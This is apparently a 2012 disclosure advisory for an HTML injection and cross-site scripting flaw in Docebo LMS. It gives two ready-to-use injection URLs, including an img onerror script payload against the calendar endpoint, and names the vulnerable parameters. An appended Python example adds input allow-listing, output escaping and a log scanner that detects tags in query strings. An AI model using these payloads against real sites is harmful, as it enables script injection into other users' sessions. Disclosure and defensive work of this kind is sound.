[ TITLE ....... ][ Docebo LMS HTML Injection
[ DATE ........ ][ 15.04.2012
[ AUTHOR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.docebo.com
[ VERSION ..... ][ docebo_3605.zip
[ TESTED ON ... ][ LAMP
[ -----------------------------------------------------------------------
[
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is the bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?

This is a very nice CMS, you should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?

HTML Injection.

[--------------------------------------------[
[ 3. Where is the bug :)

The HTTP GET 'attack' should look like this:

http://docebo/doceboLms/index.php?modname=course&op=infocourse&id_module_sel=10+payload

Vulnerable parameters are: id_module_sel, ord, op_listview_idplayitem, working_area (more?).

Anyway, I was able to 'attack' the application only in an automated way. Directly accessing the parameter id_module_sel with a payload (HTML injection string) does not work. Sending a few attacks (for example 10) seems to add the content (payload) to the DB/cache(?), and the next request (with the next payload) 'selects' it. Weird, but it works.

The question for now is how to automate this into a 'real exploitation scenario' ;) For education, of course.

Try this:

http://docebo/doceboLms/index.php?modname=course&op=infocourse&id_module_sel=10}%3E%3Ch1%3Etest%3Cbr%3Etest2%3C%2fh1%3E

Screenshots of the attack you will find @ my blog. ;)

And this:

http://docebo/doceboLms/ajax.server.php?plf=lms&mn=calendar&op=set&index=0&id=%3Ch1%3E%3Cimg%20src=x%20onerror=alert%28123%29%3Eaaaaa%3C/h1%3E&_owner=1040&calEventClass=lms&private=on&start_day=15&start_month=4&start_year=2012&start_hour=09&start_min=00&start_sec=00&end_day=15&end_month=4&end_year=2012&end_hour=09&end_min=00&end_sec=00&category=a&title=aaaaaaaaaaaaaa&description=bbbbbbbbbbbbbbb

Vulnerable parameters here are: id and index.

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.docebo.com
- http://www.google.com
- http://portswigger.net

[--------------------------------------------[
[ Ask me about new projects @ mail. ;) ]
[ Best regards [
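As an added example (not part of the advisory and not Docebo's own code), here is a defender's view of the finding in section 3, written in Python because the verifier can run it. The root cause the advisory points at is that parameters such as id_module_sel, index and id accept arbitrary text and that text later comes back as markup. The block therefore shows three things on constructed data: an allow-list check that rejects a non-integer value in those parameters before it can reach the database or cache, output-time escaping of a free-text field such as a calendar title, and a small detector that flags access-log lines whose query string carries an HTML tag. The paths and parameter names are the ones quoted in the advisory; the assumption that each listed parameter must be an integer, the helper names and the log lines are this example's own.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the advisory names as injectable. Assumption for this example:
# the application expects an integer in each of them, so anything else is
# rejected before it can reach the database or cache.
INTEGER_PARAMS = {"id_module_sel", "ord", "index", "id", "_owner"}
INT_RE = re.compile(r"^[0-9]{1,10}$")

# Loose tag detector: '<' followed by an optional '/' and a tag name.
TAG_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.IGNORECASE)


def validate_query(url):
    """Allow-list check for a request URL.

    Returns (clean, errors): 'clean' maps recognised integer parameters to
    ints and passes other parameters through as text; 'errors' lists the
    parameters that failed the integer check (empty when the request is OK).
    """
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    clean, errors = {}, []
    for name, values in params.items():
        value = values[0]  # parse_qs already percent-decodes the value
        if name in INTEGER_PARAMS:
            if INT_RE.match(value):
                clean[name] = int(value)
            else:
                errors.append(name)
        else:
            clean[name] = value
    return clean, errors


def render_event_title(title):
    """Escape a stored free-text field (e.g. a calendar title) at output time,
    for an HTML body context, so stored text can never become markup."""
    return "<h1>%s</h1>" % html.escape(title, quote=True)


def flag_html_in_query(log_line):
    """Names of query parameters in a common-log-format request line whose
    decoded value contains an HTML tag (sorted; [] when nothing is found)."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    if not m:
        return []
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    return sorted(name for name, values in params.items()
                  if any(TAG_RE.search(v) for v in values))


def scan_log(lines):
    """(1-based line number, flagged parameter names) for each suspicious line."""
    hits = []
    for number, line in enumerate(lines, 1):
        flagged = flag_html_in_query(line)
        if flagged:
            hits.append((number, flagged))
    return hits


# Constructed access-log lines for this example (not real traffic); the paths
# and parameter names follow the URLs quoted in the advisory.
LOG_SAMPLE = [
    '10.0.0.5 - - [15/Apr/2012:09:00:00 +0000] "GET /doceboLms/index.php?modname=course&op=infocourse&id_module_sel=10 HTTP/1.1" 200 512',
    '10.0.0.5 - - [15/Apr/2012:09:00:01 +0000] "GET /doceboLms/index.php?modname=course&op=infocourse&id_module_sel=10%7D%3E%3Ch1%3Etest%3Cbr%3Etest2%3C%2Fh1%3E HTTP/1.1" 200 640',
    '10.0.0.5 - - [15/Apr/2012:09:00:02 +0000] "GET /doceboLms/ajax.server.php?plf=lms&mn=calendar&op=set&index=0&id=%3Ch1%3Etest%3C%2Fh1%3E&title=aaa HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for line in LOG_SAMPLE:
        url = re.search(r'"(?:GET|POST) (\S+) HTTP/', line).group(1)
        clean, errors = validate_query(url)
        print("rejected:", errors or "none", "| flagged:", flag_html_in_query(line))
    print(render_event_title("<h1>test</h1>"))
```

The two halves are deliberately separate: the allow-list runs on input and blocks the advisory's id_module_sel and id payloads outright, while the escaping runs on output and protects fields like title and description that legitimately hold free text. The log scan is the cheap retrospective check for the "automated" variant the advisory describes, where a run of requests carrying markup in a numeric parameter is what to look for.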